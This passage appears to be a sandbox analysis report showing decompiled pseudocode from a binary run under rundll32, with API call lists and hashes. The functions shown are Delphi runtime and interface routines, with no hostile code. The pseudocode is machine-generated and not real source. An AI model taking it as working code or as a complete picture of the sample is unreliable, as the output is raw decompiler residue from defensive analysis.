                          				char _v860;
                          				char _v1116;
                          				void* __edi;
                          				struct HINSTANCE__* _t40;
                          				intOrPtr _t51;
                          				struct HINSTANCE__* _t53;
                          				void* _t69;
                          				void* _t73;
                          				intOrPtr _t74;
                          				intOrPtr _t83;
                          				intOrPtr _t86;
                          				intOrPtr* _t87;
                          				void* _t93;
                          
                          				_t93 = __fp0;
                          				_v8 = __ecx;
                          				_t73 = __edx;
                          				_t87 = __eax;
                          				VirtualQuery(__edx,  &_v820, 0x1c);
                          				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                          					_t40 =  *0xe7f668; // 0xe10000
                          					GetModuleFileNameA(_t40,  &_v534, 0x105);
                          					_v12 = E00E1B6A8(_t73);
                          				} else {
                          					_v12 = _t73 - _v820.AllocationBase;
                          				}
                          				E00E189EC( &_v273, 0x104, E00E1C79C(0x5c) + 1);
                          				_t74 = 0xe1b834;
                          				_t86 = 0xe1b834;
                          				_t83 =  *0xe17204; // 0xe17250
                          				if(E00E13400(_t87, _t83) != 0) {
                          					_t74 = E00E14528( *((intOrPtr*)(_t87 + 4)));
                          					_t69 = E00E18988(_t74, 0xe1b834);
                          					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                          						_t86 = 0xe1b838;
                          					}
                          				}
                          				_t51 =  *0xe7e2dc; // 0xe16fb4
                          				_t16 = _t51 + 4; // 0xffe8
                          				_t53 =  *0xe7f668; // 0xe10000
                          				LoadStringA(E00E15388(_t53),  *_t16,  &_v790, 0x100);
                          				E00E131C4( *_t87,  &_v1116);
                          				_v860 =  &_v1116;
                          				_v856 = 4;
                          				_v852 =  &_v273;
                          				_v848 = 6;
                          				_v844 = _v12;
                          				_v840 = 5;
                          				_v836 = _t74;
                          				_v832 = 6;
                          				_v828 = _t86;
                          				_v824 = 6;
                          				E00E19010(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                          				return E00E18988(_v8, _t86);
                          			}

                          APIs
                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00E1B6D1
                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00E1B6F5
                          • GetModuleFileNameA.KERNEL32(00E10000,?,00000105), ref: 00E1B710
                          • LoadStringA.USER32 ref: 00E1B7A6
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: FileModuleName$LoadQueryStringVirtual
                          • String ID: Pr
                          • API String ID: 3990497365-1261746714
                          • Opcode ID: cbd8977cee5997cca1cc4c965d8a3bcca3710723a91c68f721d955b8ab2dc780
                          • Instruction ID: 134ba4586bb51561bc81105f5a24fac9afb5434a4cc26e6a6badc11c06579311
                          • Opcode Fuzzy Hash: cbd8977cee5997cca1cc4c965d8a3bcca3710723a91c68f721d955b8ab2dc780
                          • Instruction Fuzzy Hash: 4E410470A002589BCB21EBA8CC85BDAB7FCAB58700F4451E6A548F7252DB709FC8CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E00E130DC() {
                          				void* _v8;
                          				char _v12;
                          				int _v16;
                          				signed short _t12;
                          				signed short _t14;
                          				intOrPtr _t27;
                          				void* _t29;
                          				void* _t31;
                          				intOrPtr _t32;
                          
                          				_t29 = _t31;
                          				_t32 = _t31 + 0xfffffff4;
                          				_v12 =  *0xe7c020 & 0x0000ffff;
                          				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                          					_t12 =  *0xe7c020; // 0x27f
                          					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                          					 *0xe7c020 = _t14;
                          					return _t14;
                          				} else {
                          					_push(_t29);
                          					_push(0xe1314d);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t32;
                          					_v16 = 4;
                          					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                          					_pop(_t27);
                          					 *[fs:eax] = _t27;
                          					_push(0xe13154);
                          					return RegCloseKey(_v8);
                          				}
                          			}

                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00E130FE
                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00E1314D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00E13131
                          • RegCloseKey.ADVAPI32(?,00E13154,00000000,?,00000004,00000000,00E1314D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00E13147
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                          • API String ID: 3677997916-4173385793
                          • Opcode ID: 799c855ee85d2a7a5c87ad4ab8ecfaca93a67885f3b8dff5ea599c3c1e2bb702
                          • Instruction ID: b786b7d615a0ea40c8065f2ea0d08f563349ed8567b717012d87a253f876afdb
                          • Opcode Fuzzy Hash: 799c855ee85d2a7a5c87ad4ab8ecfaca93a67885f3b8dff5ea599c3c1e2bb702
                          • Instruction Fuzzy Hash: 26017179A40308BADB11DBA0CC42BEAB7ECEB09B04F5011A5BA04F6690E6745A94D794
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E00E23BFC() {
                          				intOrPtr _t14;
                          				intOrPtr* _t16;
                          				intOrPtr* _t17;
                          				intOrPtr* _t18;
                          				intOrPtr* _t19;
                          				intOrPtr* _t20;
                          				intOrPtr _t23;
                          
                          				_push(_t23);
                          				_push(0xe23c9d);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t23;
                          				 *0xe7f824 =  *0xe7f824 - 1;
                          				if( *0xe7f824 < 0) {
                          					E00E23708();
                          					 *0xe7f814 = E00E1ECB8;
                          					 *0xe7f818 = E00E1E85C;
                          					 *0xe7f81c = E00E1E76C;
                          					 *0xe7f820 = E00E1E85C;
                          					_t16 =  *0xe7e0a0; // 0xe7c00c
                          					 *_t16 = E00E1EFB8;
                          					_t17 =  *0xe7ddf4; // 0xe7c010
                          					 *_t17 = 0xe233fc;
                          					_t18 =  *0xe7e138; // 0xe7c014
                          					 *_t18 = E00E1F2CC;
                          					_t19 =  *0xe7e2d0; // 0xe7c018
                          					 *_t19 = E00E22294;
                          					_t20 =  *0xe7e160; // 0xe7c01c
                          					 *_t20 = E00E229BC;
                          					_push(0xe7f82c);
                          					L00E164A0();
                          				}
                          				_pop(_t14);
                          				 *[fs:eax] = _t14;
                          				_push(0xe23ca4);
                          				return 0;
                          			}

                          APIs
                          • RtlInitializeCriticalSection.KERNEL32(00E7F82C,00000000,00E23C9D), ref: 00E23C8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection
                          • String ID: ,($\$\$l
                          • API String ID: 32694325-458685388
                          • Opcode ID: 1c89b9843425bcaa255a2f9f2a3c41abf53782cd9eb0abde68a0be4427bcdb63
                          • Instruction ID: e134d07d11122e3abb969326cf60ed51c507338b27ed9f2021cc48c702994e7d
                          • Opcode Fuzzy Hash: 1c89b9843425bcaa255a2f9f2a3c41abf53782cd9eb0abde68a0be4427bcdb63
                          • Instruction Fuzzy Hash: AB0116B42043409FA309CF2AF803912BBE5F78E704390A579E808FB760E23499C5CF96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00E416F4(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _v8;
                          				signed char _t92;
                          				int _t98;
                          				int _t100;
                          				intOrPtr _t117;
                          				int _t122;
                          				intOrPtr _t155;
                          				void* _t164;
                          				signed char _t180;
                          				intOrPtr _t182;
                          				intOrPtr _t194;
                          				int _t199;
                          				intOrPtr _t203;
                          				void* _t204;
                          
                          				_t204 = __eflags;
                          				_t202 = _t203;
                          				_push(__ecx);
                          				_v8 = __eax;
                          				E00E598E4(_v8);
                          				_push(_t203);
                          				_push(0xe4194a);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t203;
                          				 *(_v8 + 0x268) = 0;
                          				 *(_v8 + 0x26c) = 0;
                          				 *(_v8 + 0x270) = 0;
                          				_t164 = 0;
                          				_t92 =  *0xe7f665; // 0x0
                          				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                          				E00E59040(_v8, 0, __ecx, __edx, _t204);
                          				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                          					L12:
                          					_t98 =  *(_v8 + 0x268);
                          					_t213 = _t98;
                          					if(_t98 > 0) {
                          						E00E56348(_v8, _t98, _t213);
                          					}
                          					_t100 =  *(_v8 + 0x26c);
                          					_t214 = _t100;
                          					if(_t100 > 0) {
                          						E00E5638C(_v8, _t100, _t214);
                          					}
                          					_t180 =  *0xe41958; // 0x0
                          					 *(_v8 + 0x98) = _t180;
                          					_t215 = _t164;
                          					if(_t164 == 0) {
                          						E00E40D54(_v8, 1, 1);
                          						E00E5CAA4(_v8, 1, 1, _t215);
                          					}
                          					E00E57A98(_v8, 0, 0xb03d, 0);
                          					_pop(_t182);
                          					 *[fs:eax] = _t182;
                          					_push(0xe41951);
                          					return E00E598EC(_v8);
                          				} else {
                          					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                          						_t194 =  *0xe7fb20; // 0xf01458
                          						_t22 = _t194 + 0x40; // 0x60
                          						if( *(_v8 + 0x25c) !=  *_t22) {
                          							_t155 =  *0xe7fb20; // 0xf01458
                          							_t25 = _t155 + 0x40; // 0x60
                          							E00E3010C( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00E30104( *((intOrPtr*)(_v8 + 0x68))),  *_t25,  *(_v8 + 0x25c)), __edi, _t202);
                          						}
                          					}
                          					_t117 =  *0xe7fb20; // 0xf01458
                          					_t28 = _t117 + 0x40; // 0x60
                          					 *(_v8 + 0x25c) =  *_t28;
                          					_t199 = E00E41A7C(_v8);
                          					_t122 =  *(_v8 + 0x270);
                          					_t209 = _t199 - _t122;
                          					if(_t199 != _t122) {
                          						_t164 = 1;
                          						E00E40D54(_v8, _t122, _t199);
                          						E00E5CAA4(_v8,  *(_v8 + 0x270), _t199, _t209);
                          						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                          							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                          						}
                          						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                          							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                          						}
                          						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                          							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                          							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                          						}
                          					}
                          					goto L12;
                          				}
                          			}

                          APIs
                          • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 00E417B3
                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 00E4182F
                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 00E4185E
                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 00E4188D
                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 00E418B0
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 20205850a4d1dbcf85ce6085c40f17c400eb07bd7b72d7dd8a1ec36334418fb4
                          • Instruction ID: 503ec4aef9b77c972c9b9f8c69c8eca5cb5c152e79fc7ea3b1cc23f8eac113aa
                          • Opcode Fuzzy Hash: 20205850a4d1dbcf85ce6085c40f17c400eb07bd7b72d7dd8a1ec36334418fb4
                          • Instruction Fuzzy Hash: 0C71B274B04208EFDB04DBA8C599AA9B7F5AF49304F2951F4E808EB362D731AE45DB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E4D084(int __eax, void* __edx) {
                          				void* __edi;
                          				void* __esi;
                          				signed int _t39;
                          				signed int _t40;
                          				intOrPtr _t44;
                          				int _t45;
                          				void* _t47;
                          				int _t48;
                          				intOrPtr* _t49;
                          
                          				_t18 = __eax;
                          				_t49 = __eax;
                          				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                          					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                          						 *((char*)(__eax + 0x74)) = 1;
                          						return __eax;
                          					}
                          					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                          					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                          						return E00E4D084(_t19, __edx);
                          					}
                          					_t18 = GetMenuItemCount(E00E4D1B4(__eax, _t45, _t47));
                          					_t48 = _t18;
                          					_t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
                          					while(_t48 > 0) {
                          						_t45 = _t48 - 1;
                          						_t18 = GetMenuState(E00E4D1B4(_t49, _t45, _t48), _t45, 0x400);
                          						if((_t18 & 0x00000004) == 0) {
                          							_t18 = RemoveMenu(E00E4D1B4(_t49, _t45, _t48), _t45, 0x400);
                          							_t40 = 1;
                          						}
                          						_t48 = _t48 - 1;
                          					}
                          					if(_t40 != 0) {
                          						if( *((intOrPtr*)(_t49 + 0x64)) != 0) {
                          							L14:
                          							E00E4CF44(_t49, _t45, _t48);
                          							L15:
                          							return  *((intOrPtr*)( *_t49 + 0x3c))();
                          						}
                          						_t44 =  *0xe4bb98; // 0xe4bbe4
                          						if(E00E13400( *((intOrPtr*)(_t49 + 0x70)), _t44) == 0 || GetMenuItemCount(E00E4D1B4(_t49, _t45, _t48)) != 0) {
                          							goto L14;
                          						} else {
                          							DestroyMenu( *(_t49 + 0x34));
                          							 *(_t49 + 0x34) = 0;
                          							goto L15;
                          						}
                          					}
                          				}
                          				return _t18;
                          			}

                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bf348e48a5f4c068a8bfcd387b37f4a99d267dcedf1502e3c239a48db9abccab
                          • Instruction ID: 9cc9ee9e5de37e0e83e16327cde709af95fa698eb4661639dc8827598162beff
                          • Opcode Fuzzy Hash: bf348e48a5f4c068a8bfcd387b37f4a99d267dcedf1502e3c239a48db9abccab
                          • Instruction Fuzzy Hash: DE1190B170E2499BDB61AB3AAD05B9A37C99F9178CF046025BD51FB342CA64CC468690
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E3539C(int __eax) {
                          				int _t21;
                          				signed int _t29;
                          				char _t34;
                          				int _t42;
                          				int _t43;
                          				struct HDC__* _t44;
                          				intOrPtr _t45;
                          
                          				_t21 = __eax;
                          				_t42 = __eax;
                          				_t45 =  *((intOrPtr*)(__eax + 0x28));
                          				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
                          					_t22 =  *((intOrPtr*)(_t45 + 0x14));
                          					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
                          						E00E33D10(_t22);
                          					}
                          					_t21 = E00E31864( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
                          					_t43 = _t21;
                          					 *(_t45 + 0x10) = _t43;
                          					if(_t43 == 0) {
                          						_t44 = E00E31174(GetDC(0));
                          						if( *((char*)(_t45 + 0x71)) != 0) {
                          							L9:
                          							_t34 = 1;
                          						} else {
                          							_t29 = GetDeviceCaps(_t44, 0xc);
                          							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
                          								goto L9;
                          							} else {
                          								_t34 = 0;
                          							}
                          						}
                          						 *((char*)(_t45 + 0x71)) = _t34;
                          						if(_t34 != 0) {
                          							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
                          						}
                          						_t21 = ReleaseDC(0, _t44);
                          						if( *(_t45 + 0x10) == 0) {
                          							 *((char*)(_t42 + 0x30)) = 1;
                          							return _t21;
                          						}
                          					}
                          				}
                          				return _t21;
                          			}

                          APIs
                          • GetDC.USER32(00000000), ref: 00E353F2
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E35407
                          • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00E35411
                          • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00E33EE7,00000000,00E33F73), ref: 00E35435
                          • ReleaseDC.USER32 ref: 00E35440
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDevice$CreateHalftonePaletteRelease
                          • String ID:
                          • API String ID: 2404249990-0
                          • Opcode ID: acae64d93c69d4f579c4e5cee771769023839340d76377000ce6735ad1740363
                          • Instruction ID: 1a09a17ca5d64fb15b03fad26278cede4b8f6f9e96059d5a8277ff3362ee0214
                          • Opcode Fuzzy Hash: acae64d93c69d4f579c4e5cee771769023839340d76377000ce6735ad1740363
                          • Instruction Fuzzy Hash: E711D0326417A9AADB24EF349849BFE3ED2AF01756F002124F911BA381D7B088D4C3A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E00E45B90(void* __eax) {
                          				void* _t16;
                          				void* _t39;
                          				signed int _t42;
                          
                          				_t16 = __eax;
                          				_t39 = __eax;
                          				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0xe7c9f8 != 0) {
                          					_t16 = E00E5D240(__eax);
                          					if(_t16 != 0) {
                          						_t42 = GetWindowLongA(E00E5CFE0(_t39), 0xffffffec);
                          						if( *((char*)(_t39 + 0x2e0)) != 0 ||  *((char*)(_t39 + 0x2e8)) != 0) {
                          							if((_t42 & 0x00080000) == 0) {
                          								SetWindowLongA(E00E5CFE0(_t39), 0xffffffec, _t42 | 0x00080000);
                          							}
                          							return  *0xe7c9f8(E00E5CFE0(_t39),  *((intOrPtr*)(_t39 + 0x2ec)),  *((intOrPtr*)(_t39 + 0x2e1)),  *0x00E7CA7C |  *0x00E7CA84);
                          						} else {
                          							SetWindowLongA(E00E5CFE0(_t39), 0xffffffec, _t42 & 0xfff7ffff);
                          							return RedrawWindow(E00E5CFE0(_t39), 0, 0, 0x485);
                          						}
                          					}
                          				}
                          				return _t16;
                          			}

                          APIs
                          • GetWindowLongA.USER32 ref: 00E45BC4
                          • SetWindowLongA.USER32 ref: 00E45BF6
                          • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,00E43784), ref: 00E45C30
                          • SetWindowLongA.USER32 ref: 00E45C49
                          • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,00E43784), ref: 00E45C5F
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayeredRedraw
                          • String ID:
                          • API String ID: 1758778077-0
                          • Opcode ID: 731f5e2aa6555ed693f12786e1ae07e54e8935e5e89ff94a8214bd453bd710b4
                          • Instruction ID: 128c89c52e00206a061bb259c25ec564304858bc689581c514d6c726e5619244
                          • Opcode Fuzzy Hash: 731f5e2aa6555ed693f12786e1ae07e54e8935e5e89ff94a8214bd453bd710b4
                          • Instruction Fuzzy Hash: 2F11E7716087901FCB50AF785CDAF8927CC0B46355F283974BD99FE287C664C888C328
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E00E317CC(void* __eax) {
                          				char _v5;
                          				struct HDC__* _v12;
                          				struct HPALETTE__* _t21;
                          				struct HPALETTE__* _t25;
                          				void* _t28;
                          				intOrPtr _t35;
                          				void* _t37;
                          				void* _t39;
                          				intOrPtr _t40;
                          
                          				_t37 = _t39;
                          				_t40 = _t39 + 0xfffffff8;
                          				_t28 = __eax;
                          				_v5 = 0;
                          				if( *0xe7f894 == 0) {
                          					return _v5;
                          				} else {
                          					_v12 = GetDC(0);
                          					_push(_t37);
                          					_push(0xe31852);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t40;
                          					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
                          						_t21 =  *0xe7f894; // 0x6008075c
                          						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
                          						_t25 =  *0xe7f894; // 0x6008075c
                          						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
                          						_v5 = 1;
                          					}
                          					_pop(_t35);
                          					 *[fs:eax] = _t35;
                          					_push(0xe31859);
                          					return ReleaseDC(0, _v12);
                          				}
                          			}

                          APIs
                          • GetDC.USER32(00000000), ref: 00E317E4
                          • GetDeviceCaps.GDI32(?,00000068), ref: 00E31800
                          • GetPaletteEntries.GDI32(6008075C,00000000,00000008,?), ref: 00E31818
                          • GetPaletteEntries.GDI32(6008075C,00000008,00000008,?), ref: 00E31830
                          • ReleaseDC.USER32 ref: 00E3184C
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: EntriesPalette$CapsDeviceRelease
                          • String ID:
                          • API String ID: 3128150645-0
                          • Opcode ID: 588e65d4474382012264cc38c02c522ae571704196f2baf118dbe78194d16723
                          • Instruction ID: f03f0d201b0d04d3125ee4edbc14c40c5673c8a394483725c19eaa73ed0ecce2
                          • Opcode Fuzzy Hash: 588e65d4474382012264cc38c02c522ae571704196f2baf118dbe78194d16723
                          • Instruction Fuzzy Hash: A611C071A48344AEFB08DBA49C46FAD7BECE709700F4480A9F608FA5C1DA769488C725
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E00E1B3D0(void* __esi, void* __eflags) {
                          				char _v8;
                          				intOrPtr* _t18;
                          				intOrPtr _t26;
                          				void* _t27;
                          				long _t29;
                          				intOrPtr _t32;
                          				void* _t33;
                          
                          				_t33 = __eflags;
                          				_push(0);
                          				_push(_t32);
                          				_push(0xe1b467);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t32;
                          				E00E1B148(GetThreadLocale(), 0xe1b47c, 0x100b,  &_v8);
                          				_t29 = E00E183E8(0xe1b47c, 1, _t33);
                          				if(_t29 + 0xfffffffd - 3 < 0) {
                          					EnumCalendarInfoA(E00E1B31C, GetThreadLocale(), _t29, 4);
                          					_t27 = 7;
                          					_t18 = 0xe7f770;
                          					do {
                          						 *_t18 = 0xffffffff;
                          						_t18 = _t18 + 4;
                          						_t27 = _t27 - 1;
                          					} while (_t27 != 0);
                          					EnumCalendarInfoA(E00E1B358, GetThreadLocale(), _t29, 3);
                          				}
                          				_pop(_t26);
                          				 *[fs:eax] = _t26;
                          				_push(0xe1b46e);
                          				return E00E14068( &_v8);
                          			}

                          APIs
                          • GetThreadLocale.KERNEL32(?,00000000,00E1B467,?,?,00000000), ref: 00E1B3E8
                            • Part of subcall function 00E1B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00E1B166
                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00E1B467,?,?,00000000), ref: 00E1B418
                          • EnumCalendarInfoA.KERNEL32(Function_0000B31C,00000000,00000000,00000004), ref: 00E1B423
                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00E1B467,?,?,00000000), ref: 00E1B441
                          • EnumCalendarInfoA.KERNEL32(Function_0000B358,00000000,00000000,00000003), ref: 00E1B44C
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread$CalendarEnum
                          • String ID:
                          • API String ID: 4102113445-0
                          • Opcode ID: 4d008f5c6f1f441ce7f22974f6d3bb269ef1f6f527be63798b8c45b508629946
                          • Instruction ID: e4e71e60bd8b475065391acb0247abf4376ec19f07f9c963678eb694e8f1a774
                          • Opcode Fuzzy Hash: 4d008f5c6f1f441ce7f22974f6d3bb269ef1f6f527be63798b8c45b508629946
                          • Instruction Fuzzy Hash: CC01D6B5640714AFE701B774CC13BDEB2ECDB96710F91A560F530BA6E2EB649E808264
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E471C0() {
                          				void* _t2;
                          				void* _t5;
                          				void* _t8;
                          				struct HHOOK__* _t10;
                          
                          				if( *0xe7fb34 != 0) {
                          					_t10 =  *0xe7fb34; // 0x0
                          					UnhookWindowsHookEx(_t10);
                          				}
                          				 *0xe7fb34 = 0;
                          				if( *0xe7fb38 != 0) {
                          					_t2 =  *0xe7fb30; // 0x0
                          					SetEvent(_t2);
                          					if(GetCurrentThreadId() !=  *0xe7fb2c) {
                          						_t8 =  *0xe7fb38; // 0x0
                          						WaitForSingleObject(_t8, 0xffffffff);
                          					}
                          					_t5 =  *0xe7fb38; // 0x0
                          					CloseHandle(_t5);
                          					 *0xe7fb38 = 0;
                          					return 0;
                          				}
                          				return 0;
                          			}

                          APIs
                          • UnhookWindowsHookEx.USER32(00000000), ref: 00E471CF
                          • SetEvent.KERNEL32(00000000,00E493BA,00000000,00E4925E), ref: 00E471EA
                          • GetCurrentThreadId.KERNEL32 ref: 00E471EF
